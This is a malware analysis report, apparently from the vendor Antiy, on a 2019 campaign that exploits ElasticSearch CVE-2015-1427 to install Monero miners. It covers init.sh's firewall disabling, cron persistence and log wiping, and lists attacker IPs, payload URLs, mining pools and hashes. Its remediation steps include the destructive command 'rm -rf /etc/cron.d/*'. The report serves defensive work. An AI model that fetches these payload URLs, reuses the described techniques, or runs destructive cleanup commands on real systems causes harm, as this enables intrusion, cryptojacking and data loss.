1、Overview
On June 13, 2019, the Attack Capture System of Antiy
captured the attack that exploits the CVE-2015-1427 (ElasticSearch
Groovy) remote command execution vulnerability. The principle of the
vulnerability is that Elaticsearch uses groovy as a scripting language
and uses a sandbox mechanism based on black and white list to limit
dangerous code execution, but the mechanism is not strict enough and can
be bypassed, resulting in remote code execution. Antiy conducted a
detailed sample analysis of the incident and made recommendations for
prevention and repair.
2、Sample Analysis
2.1 Critical Payload
From the perspective of payload, the attacker uses
groovy as a scripting language and sends a json script with a malicious
link to http://185.181.10.234/E5DB0E07C3D7BE80V520/init.sh to the
_search?pretty page for malicious shell script download, so as to
perform the remote code attack and mining.
Figure 2-1 Data Packet Content
After decryption, the core code is:
Figure 2-2 Core Code
2.2 Sample Analysis
1) Analysis of Intrusion Script—init.sh
The attacker downloads and executes the malicious
script init.sh to implant the Dog mining program via
http://185.181.10.234/E5DB0E07C3D7BE80V520/init.sh, and do a series of
operations to host such as scanning.
Figure 2-3 Turn Off the Firewall
After that, it turns off the firewall, shuts down
selinux and releases the occupied resources, kills other processes
related to mining, sets the timed tasks (downloads the executable file
update.sh every 30 minutes), obtains ssh permissions, forwards and
modifies the iptables rules, and cleans up the related operation
history, logs and other operations.
Figure 2-4 Checks and Kills Other Existing Mining Processes
Figure 2-5 Setting the Timed Task
Figure 2-6 Malicious Script Download Address, Backup Address and Size Settings
Figure 2-7 Clearing Related Logs and History
In this process, the script checks whether the three
processes of sysupdate, networkservice and sysguard) are running, and
starts them if not.
Figure 2-8 When One of Them Is Killed, the Schedule File Restarts
2) Sample Analysis—sysguard、networkservice、sysupdate
The three samples are written in Go language and
shelled with UPX. The corresponding main_main function structures are as
follows:
Figure 2-9 The Function Structure of sysguard-main_main
Figure 2-10 The Function Structure of networkservice-main_main
Figure 2-11 sysupdate-main Function
Compared with the previously captured systemctI
sample, it is found that the attack is divided into three processes:
mining, scanning and function calling. Moreover, related vulnerability
exploitation function and scan function are found in networkservice
sample.
Figure 2-12 networkservice Scanning Function
By comparing the previously captured samples, we find
that the attack techniques are similar, except that this attack is
jointly carried out by sysguard, networkservice (scanning) and
sysupdate. This also means that the three processes should all be killed
if the server is diagnosed to be infected.
3) Configuration File—config.json
In the downloaded configuration file, we find multiple mining pools addresses:
Table 2-1 List of Mining Pools
| Mining Pools |
| xmr.f2pool.com:13531 |
| cryptonightr.in.nicehash.com:3375 |
| cryptonightr.br.nicehash.com:3375 |
| cryptonightr.hk.nicehash.com:3375 |
| cryptonightr.jp.nicehash.com:3375 |
| cryptonightr.usa.nicehash.com:3375 |
Figure 2-13 Configuration File
3、Affected Services and Vulnerabilities
Table 3-1 Affected Services and Vulnerabilities
| Services | Vulnerabilities |
| Weblogic | CVE-2017-10271 |
| Thinkphp5 | Remote code execution |
| Spring Data Commons | CVE-2018-1273 |
| Hadoop | Unauthorized access |
| ElasticSearch | CVE-2014-3120 CVE-2015-1427 |
| Drupal | CVE-2018-7600 |
| Redis | Unauthorized access |
| SQL Server | Weak password |
4、IOC
Table 4-1 Attack IP
| IP | Geographic Position |
| 132.145.186.243 | USA |
| 111.40.10.11 | China – Heilongjiang – Harbin |
| 167.86.106.102 | US-Colorado-Littleton |
| 221.176.156.164 | China-Henan-Kaifeng |
| 185.181.10.234 | Germany – Hessen – Frankfurt |
Table 4-2 URL
| URL |
| http://185.181.10.234/E5DB0E07C3D7BE80V520/config.json |
| http://185.181.10.234/E5DB0E07C3D7BE80V520/networkservice |
| http://185.181.10.234/E5DB0E07C3D7BE80V520/sysguard |
| http://185.181.10.234/E5DB0E07C3D7BE80V520/sysupdate |
| http://185.181.10.234/E5DB0E07C3D7BE80V520/update.sh |
| https://de.gsearch.com.de/api/config.json |
| https://de.gsearch.com.de/api/networkservice |
| https://de.gsearch.com.de/api/sysguard |
| https://de.gsearch.com.de/api/sysupdate |
| https://de.gsearch.com.de/api/update.sh |
| http://185.181.10.234/E5DB0E07C3D7BE80V520/init.sh |
Table 4-3 MD5
| MD5 |
| 09c3dbdb39e1437a40b5c22600b375ca |
| 8e9957b496a745f5db09b0f963eba74e |
| c31038f977f766eeba8415f3ba2c242c |
| ff879d31ed80841482c27c90e2bfe268 |
| 1cc08560de0edb78a9c4a0f1ba664e5f |
5、Recommendations for Prevention and Repair
Recommendations for Prevention:
a) Ensure that the system and application download and update the latest patches provided by the authorities on a regular basis;
b) Prohibit the use of weak passwords;
c) Regularly check server anomalies, such as continuous high CPU usage and disk exceptions;
d) Install endpoint threat security product—Antiy
Intelligent Endpoint Protection System. Antiy Intelligent Endpoint
Protection System can customize the exclusive security baseline for you
to create a secure intranet environment. At the same time, with its
document security protection function, Whole network virus fixed point
clear function, and the security protection function of domestic
operating system, it can better solve your security problems and protect
your server.
Recommendations for Recovery:
a) Disconnect network, back up important crontab, close or delete timed tasks: systemctl stop crontab or rm -rf /etc/cron.d/*;
b) Lock malicious files in the crontab;
c) Check and kill the virus process: kill sysguard, networkservice, sysupdate three processes at the same time;
d) Delete virus-related files;;
e) After confirming there is no error, restart the
server, install the vulnerability patch and use the Antiy Intelligent
Endpoint Protection System to prevent risk and protect the security of
the server.
Appendix I: Reference linking
[1] Reversing GO binaries like a pro:https://rednaga.io/2016/09/21/reversing_go_binaries_like_a_pro/
